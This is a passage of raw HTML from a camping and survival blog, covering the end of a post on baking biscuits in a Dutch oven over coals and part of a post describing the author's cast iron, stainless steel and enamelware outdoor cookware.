data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/17.jpg?w=497" class="aligncenter size-large wp-image-3344" src="https://sensiblesurvival.files.wordpress.com/2018/07/17.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/17.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/17.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/17.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/17.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/17.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>And set your biscuit pan down into the oven.  The lug nuts will hold the pan up off of the bottom of the oven and allow the heat to circulate around the pan better.<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/18-9/" rel="attachment wp-att-3345"><img data-attachment-id="3345" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/18-9/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/18.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532257261&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.00625&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="18" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/18.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/18.jpg?w=497" class="aligncenter size-large wp-image-3345" src="https://sensiblesurvival.files.wordpress.com/2018/07/18.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/18.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/18.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/18.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/18.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/18.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Put the lid on the Dutch oven and shovel an even layer of coals onto the lid.<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/19-9/" rel="attachment wp-att-3346"><img data-attachment-id="3346" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/19-9/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/19.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532257278&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.0125&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="19" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/19.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/19.jpg?w=497" class="aligncenter size-large wp-image-3346" src="https://sensiblesurvival.files.wordpress.com/2018/07/19.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/19.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/07/19.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/07/19.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/07/19.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/07/19.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/20-8/" rel="attachment wp-att-3347"><img data-attachment-id="3347" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/20-8/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/20.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532257327&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.008&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="20" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/20.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/20.jpg?w=497" class="aligncenter size-large wp-image-3347" src="https://sensiblesurvival.files.wordpress.com/2018/07/20.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/20.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/20.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/20.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/20.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/20.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/21-6/" rel="attachment wp-att-3348"><img data-attachment-id="3348" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/21-6/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/21.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532257388&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.008&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="21" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/21.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/21.jpg?w=497" class="aligncenter size-large wp-image-3348" src="https://sensiblesurvival.files.wordpress.com/2018/07/21.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/21.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/07/21.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/07/21.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/07/21.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/07/21.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Let the biscuits cook for ten minutes, then use your lifter to rotate the Dutch oven 180 degrees one direction. Then lift the lid and rotate it 180 degrees back the other direction.  This is, again, to try and keep the heat distributed evenly.</p> <p>&nbsp;</p> <p>Let the biscuits cook for another ten minutes then carefully remove the lid. <a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/22-8/" rel="attachment wp-att-3349"><img data-attachment-id="3349" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/22-8/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/22.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532259334&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.00625&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="22" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/22.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/22.jpg?w=497" class="aligncenter size-large wp-image-3349" src="https://sensiblesurvival.files.wordpress.com/2018/07/22.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/22.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/22.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/22.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/22.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/22.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>You should now have a nicely cooked pan of hot biscuits waiting for some butter and jelly or maybe a nice ladle full of sausage gravy.</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> </div><!--end entry--> <div class="post-footer"> <div class="comments"> <a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/#respond">Leave a Comment</a> </div><!-- .comments --> </div><!--end post footer--> </div><!--end post--> <div id="post-3308" class="post-3308 post type-post status-publish format-standard hentry category-food-preparation-and-recipes tag-camp-cooking tag-cooking-on-a-campfire tag-outdoor-cooking-utensils tag-outdoor-cookware"> <div class="post-header"> <div class="date"><a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/">June 11, 2018</a></div> <h2><a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/" rel="bookmark" title="Permanent Link to Outdoor Cookware">Outdoor Cookware</a></h2> <div class="author"> </div> </div><!--end post header--> <div class="entry clear"> <p>If you’re cooking outdoors it is important that your cookware is durable.  Cast iron and stainless steel are the materials of choice.  Those nice pottery bowls and Teflon pans may be okay for the kitchen, but they have no place around a campfire.</p> <p>Cast Iron Cookware</p> <p>I have four pieces of cast iron cookware in my cooking gear.  I have a 10” cast iron pot with a bail and lid.  This is convenient to hang from an “S” hook over the fire.  I use it to cook things like stew, chili, chicken and dumplings, pinto beans, and etc.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/01-26/" rel="attachment wp-att-3309"><img data-attachment-id="3309" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/01-26/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/01.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528301953&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="01" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/01.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/01.jpg?w=497" class="aligncenter size-large wp-image-3309" src="https://sensiblesurvival.files.wordpress.com/2018/06/01.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/01.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/06/01.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/06/01.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/06/01.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/06/01.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>A 12” Dutch oven is handy for baking biscuit, bread, pies, and cobblers.  It or the hanging pot are also good for cooking large chunks of meat like a pot roast.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/02-25/" rel="attachment wp-att-3310"><img data-attachment-id="3310" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/02-25/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/02.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528301665&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="02" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/02.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/02.jpg?w=497" class="aligncenter size-large wp-image-3310" src="https://sensiblesurvival.files.wordpress.com/2018/06/02.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/02.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/06/02.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/06/02.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/06/02.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/06/02.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>I have a round 12” griddle that is great for cooking pancakes, corn cakes, and tortillas.  It’s also good for cooking bacon, sausage, spam, and sliced ham.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/03-27/" rel="attachment wp-att-3311"><img data-attachment-id="3311" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/03-27/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/03.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302140&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="03" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/03.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/03.jpg?w=497" class="aligncenter size-large wp-image-3311" src="https://sensiblesurvival.files.wordpress.com/2018/06/03.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/03.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/06/03.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/06/03.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/06/03.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/06/03.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>I actually have two different sizes of cast iron skillets, but I usually just stick to a standard 10” skillet for most situations.  If I’m cooking for a pretty good crowd I have a larger 12” skillet.  These are great for cooking eggs and for frying chicken or fish.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/04-22/" rel="attachment wp-att-3312"><img data-attachment-id="3312" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/04-22/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/04.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302082&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;125&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="04" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/04.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/04.jpg?w=497" class="aligncenter size-large wp-image-3312" src="https://sensiblesurvival.files.wordpress.com/2018/06/04.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/04.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/06/04.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/06/04.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/06/04.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/06/04.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Stainless Steel Cookware</p> <p>A large stainless steel lidded pot is handy for cooking vegetables, soups, rice, or anything else that you would cook in a pot on your stove.  I have such a pot that I use for large groups, but I don’t use it often.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/05-22/" rel="attachment wp-att-3313"><img data-attachment-id="3313" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/05-22/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/05.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302037&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="05" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/05.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/05.jpg?w=497" class="aligncenter size-large wp-image-3313" src="https://sensiblesurvival.files.wordpress.com/2018/06/05.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/05.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/06/05.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/06/05.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/06/05.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/06/05.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>I use a deep, round baking pan that fits inside my Dutch oven when I cook biscuits or bread. Some people cook biscuits and bread directly in the Dutch oven, but I use this pan and set it on three steel hex-nuts that elevate it about a quarter inch from the bottom of the Dutch oven.  I find that this cooks my bread-stuffs more evenly and avoids scorching the bottoms.  The pan pictured here is actually a new one.  My old one was fairly shallow, and I’m looking forward to using the new pan.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/06-22/" rel="attachment wp-att-3314"><img data-attachment-id="3314" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/06-22/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/06.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528301722&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.01&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="06" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/06.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/06.jpg?w=497" class="aligncenter size-large wp-image-3314" src="https://sensiblesurvival.files.wordpress.com/2018/06/06.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/06.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/06/06.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/06/06.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/06/06.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/06/06.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>I also have a big stainless steel bowl that serves as my wash basin for doing dishes. It also doubles as my dough bowl for mixing up bread dough and letting it rise.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/07-21/" rel="attachment wp-att-3315"><img data-attachment-id="3315" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/07-21/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302459&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.016666666666667&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="07" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=497" class="aligncenter size-large wp-image-3315" src="https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Enamelware</p> <p>I have an enamelware coffee pot that has seen a good number of campfires.  Some people cook camp coffee by putting the grounds directly in the water, boiling it up, and then throwing in a cup of cold water to make the grounds settle.  Maybe you can make this work, but I always end up straining coffee grounds through my teeth.  I prefer to use the removable basket and percolator tube to make my coffee.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/08-21/" rel="attachment wp-att-3316"><img data-attachment-id="3316" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/08-21/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/08.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302288&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;160&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="08" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/08.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/08.jpg?w=497" class="aligncenter size-large wp-image-3316" src="https://sensiblesurvival.files.wordpress.com/2018/06/08.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/08.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/06/08.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/06/08.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/06/08.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/06/08.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>A medium size enamelware bowl is used for mixing biscuit dough, pancake batter, and etc.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/07-21/" rel="attachment wp-att-3315"><img data-attachment-id="3315" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/07-21/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302459&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.016666666666667&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="07" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=497" class="aligncenter size-large wp-image-3315" src="https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/06/07.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>I use my small enamelware hanging pot to cook vegetables, soups, and etc.  I find that I use it much more often than my large stainless steel pot.<a href="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/10-16/" rel="attachment wp-att-3318"><img data-attachment-id="3318" data-permalink="https://sensiblesurvival.org/2018/06/11/outdoor-cookware/10-16/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/06/10.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1528302037&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.025&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="10" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/06/10.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/06/10.jpg?w=497" class="aligncenter size-large wp-image-3318" src="https://sensiblesurvival.files.wordpress.com/2018/06/10.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/06/10.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/06/10.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/06/10.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/06/10.jpg?w=300&amp;h=224 300w, 